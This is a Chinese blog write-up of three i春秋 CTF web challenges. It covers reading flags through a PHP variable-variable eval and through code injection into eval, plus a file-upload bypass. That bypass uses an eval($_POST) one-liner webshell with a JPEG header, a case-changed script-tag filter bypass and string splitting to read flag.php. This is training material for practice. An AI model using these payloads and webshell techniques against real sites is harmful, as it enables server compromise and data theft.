i春秋CTF-WEB题解(一)

最新推荐文章于 2024-05-09 15:55:57 发布
最新推荐文章于 2024-05-09 15:55:57 发布
阅读量3.8k 收藏 18
点赞数 2
文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42271850/article/details/107139184
版权

简述

        这次转到了i春秋平台上面练习,和之前一样也是每3道题目就写一篇题解来作为记录。

一、爆破-1(百度杯CTF比赛 2017 二月场)

在这里插入图片描述

        题目给的提示是:flag就在某六位变量中,打开题目的链接,能得到一段PHP代码。

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
  die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>

大致代码解析如下:
引入包含"flag.php"
从请求的变量hello中取值并赋值到变量a中
对变量a的值做一个正则匹配,只允许传入正常的一些字母和数字。
然后会打印出$a。这里说明a的值需要是一个变量名才行。
结合题目的提示,应该flag是在一个变量的值,需要我们传入对应的变量名然后打印出来。

        从上面的代码分析,我们知道了现在需要的就是猜出flag所在的变量名。虽然题目叫做爆破-1但是通过爆破的方式肯定不现实的。因为这需要遍历36的6次方。所以我们先尝试输入写内容,看看实际的返回。

(1)随便输入一个?hello=123,可以看到页面没变化,这时因为没有123这个变量
(2)看代码我们知道肯定有个a变量,输入?hello=a,看到打印出string(1) "a"
(3)其实说到PHP的变量,我们很容易就能联想到全局变量,因为这个名字是固定的
输入?hello=GLOBALS,能看到打印出全局变量,其中就有flag。

在这里插入图片描述

二、爆破-2(百度杯CTF比赛 2017 二月场)

在这里插入图片描述

        题目提示flag不在变量中,打开题目链接,也是一段PHP代码。

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

大致代码解析如下:
引入包含"flag.php"
从请求的变量hello中取值并赋值到变量a中
然后回执行打印a变量
可以看到这个和之前的区别在于之前是$$a,现在是$a
有一定代码审计基础的,都很容易能看出来这里存在一个注入的点。
可以通过$a闭合前面的执行语句,然后加入我们想要执行的代码。

现在我们需要构造相关参数来闭合前面的括号,执行我们传入的代码。
搜先输入 1); 闭合前面的括号,输入 var_dump(1 闭合后面的内容 
中间输入我们自己的代码 show_source("flag.php")
拼接起来 ?hello=1);show_source("flag.php");var_dump(1
就能看到在页面中展示了flag.php的文档内容

在这里插入图片描述

三、Upload(百度杯CTF比赛 九月场)

在这里插入图片描述

        看题目名字应该是一道文件上传的题目,提示中有写flag在flag.php中。打开题目地址就是个文件上传的页面。

在这里插入图片描述
        首先上传一张普通的图片,看一下有什么返回。

在这里插入图片描述
        可以看到普通的jpg格式图片是可以上传的,上传成功后会返回提示和一个链接,/u/logo.jpg。看回显的链接可以看到是将我们上传的内容放到了/u/目录下,名字也是没有另外随机命名的。尝试一下上传PHP的一句话木马。

在这里插入图片描述
        上传一句话木马的时候没有回显文件上传成功,证明被拦截了。一般文件上传题,需要注意的是上面这几点:1)文件名后缀 2)文件类型 3)文件头 4)文件内容。我们一个个改。

首先将文件名改为web_shell.jpg,没有显示文件上传成功。
然后将Contetn-Type改为image/jpeg,没有显示文件上传成功。
然后在重新制作一个图片马,在前面加入jpg的文件头
JPGFF D8 FF E0 00 10 4A 46 49 46 0D 0A
然后发现上传成功了。

在这里插入图片描述

但是在访问的时候,页面返回ÿØÿàJFIF @eval($_POST['key']);?>
可以很清楚看到少了 <?php ,应该是被过滤了
然后一句话改成<script language="php"> @eval($_POST['key']); </script>
然后访问页面查看源代码的时候,发现php被过滤了,然后将php改成PhP大小写绕过。
访问的时候可以看到文件内容没有返回,我们传入的内容应该是别当作php来执行了。
但是尝试?key=phpinfo()的时候,确没有返回phpinfo()页面。
我们尝试直接在上传的文件中写入读取flag.php的相关代码。

??JFIF
<script language="Php">
$a = "../flag.p";
$b = "hp";
file_get_contents($a.$b);
</script>
使用字符拼接的方式来绕过php的过滤,访问页面看到也是没直接回显。
但是右键查看源代码可以看到flag。

在这里插入图片描述

晓德
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际环境的实验平台
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
i春秋ctf练习
sparename的博客
04-24 3380
类型:Misc 题目名称:签到题 类型:Misc 题目名称:所以这是13点吗 类型:Misc 题目名称:嘀嘀嘀 类型:Misc 题目名称:山岚 类型:Misc 题目名称:签到题2 类型:Misc 题目名称:XX 类型:Misc 题目名称:贝丝家族 类型:Misc 题目名称:敲击 类型:Misc 题目名称:签到题3 类型:Misc 题目名称:小常识 类型:Misc 题目名称:回归原始
网络安全最全100道CTF题目,收好了~(附答案)_ctf选择题(1),2024网络安全大厂面试经验
最新发布
2401_84300239的博客
05-09 671
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
i春秋-CTF-web文件上传
在Web和Reverse坑里游泳中。。。。
04-27 1714
前言 本来吧,悄悄摸鱼,想整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件上传练练。 打开题目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
i春秋训练营题集(web)【1】
qq_52696970的博客
08-06 975
i春秋训练营题集(web1)签到1签到2Broken(jother编码)jother编码who are you?Rot13编码 签到1 打开网页,得到一个kali界面,随便输入后,发现不管输入什么,它自己会弹出指令,于是一直输入直到弹出所有指令即可得到flag 签到2 打开链接,是一个拼图小游戏,完成游戏即可得到flag Broken(jother编码) 打开链接,可以看到一个超链接 点击超连接可以看到如下内容 点击F12将元素里的内容复制到控制台,回车,一直提示Unexpected token ‘
2022级云曦实验室考试(一)web
lulu001128的博客
03-08 633
解决过程
南邮CTF web题目总结
超人学飞的日子
06-02 1万+
这几天写了南邮的web题目,都比较基础,但是对我这个小白来说还是收获蛮大的。可以借此总结一下web题的类型一,信息都藏在哪作为ctf题目,肯定是要有些提示的,这些提示有时会在题目介绍里说有时也会隐藏在某些地方。1,源代码,这是最最最常见的。2,http head头中,这个一般都会提下 ‘头’ 什么的。3,非常规提示,就比如这个:如果第一次做ctf题目,不知道还有这些套路,一般不会往这个方面想。二,...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
i春秋CTF题库---Who are you详解
weixin_34279246的博客
05-16 1296
1、进入链接,提示说不是管理员我们查看源代码,也没有任何线索2、查看请求头既然什么线索没有我们不妨在请求头里面找找看。接下来我们抓包看一看,3、解码cookie在cookie那里有一个角色的base64编码字符串,开始提示不是说没有管理员角色的凭证吗?这个应该就是喽。线索找到,我们将其解码,猜想thrfg是经过rot13加密过得。Rot13加密原理:回转13位,一种简易的置换暗码。ROT13也是过...
i春秋网络内生安全试验场CTF夺旗赛(第二季)部分Web题WriteUp
李熠专用博客_白帽子一枚,人称低危终结者
10-26 4575
1.easyphp 地址:http://120.55.43.255:13005/ 打开后查看源码,发现show.php。 该地址后有一个base64字符串,解码后内容为:hint.jpg 将首页地址index.php编码后,放到show.php可看到注释掉的php源码。 分析改源码可知,此题为反序列化的题,我们需要构造一个反序列化字符串的payload,通过clas...
I春秋第四季CTF-Web-Writeup(部分)
1stPeak's Blog
02-21 1600
PHP反序列化 题目总共有三个php文件 第一个:index.php 第二个:show.php 第三个:user.php 题目:http://120.55.43.255:24719,进去后没有看见任何东西 我们查看源代码:发现了一个链接 接下来,我们访问该链接,看看有什么 哦?那我们再看看user.php里有什么,什么都没有 接下来使用php伪协议分别获取index.php、show.php、us...
ctf.show_36D杯_web_给你shell
qq_45628145的博客
05-22 1624
ctf.show_36D杯_web_给你shell 进入题目,f12,有个链接view_source,还有个提示说flag在flag.txt里面,访问得到源码,下面是源码及分析 <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset($_GET['view_source'])) {
西普学院CTF习题解析——WEB(已完成16/16)
乐枕的家
09-15 2万+
源西普学院实验吧 预备知识点 页面调试 审查元素 html js php asp sql 等语法基础 请求头 响应头 伪造IP SQL注入基础 XSS基础 Web常用编码 “网站后台”概念及猜解、扫描技术 脑洞 工具参考 BurpSuite Firefox_firebug Firefox_tamperdata Firefox_modifyheader 御剑 XSSEE(编码解码器) sqlma
CTF里面的WEB题的一些解决思路
热门推荐
DALE1186487104的博客
04-19 4万+
CTF里面解决WEB题的一些常用思路:(福利:末尾有视频链接)如图( 十八罗汉)                                                                                        PS:(下文的序列号是对图片中序列号的一些补充)WEB题中常用的工具                                    (1...
CTF初体验:web19,速度要快。
y17861077326的博客
12-14 695
解题过程 进来 什么都没有,只有一句话和一段英文 ## 不管怎么样,(1)先扫下后台,(2)先看看刚进来时的request和response (1)扫描到一个 index.php ,进去发现跟之前的没什么不同。 (2)发现刚进来 response里就有flag,然后刷新一下看看他是固定的还是变化的,发现flag是变化的 flag是变化的,把每次都flag都去试下,发现都不对。 又因为这是个base64编码的串,所以随便找一次的flag,先解码看下。 然后再去试下答案,发现还是不对。而且每次进入刷新
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值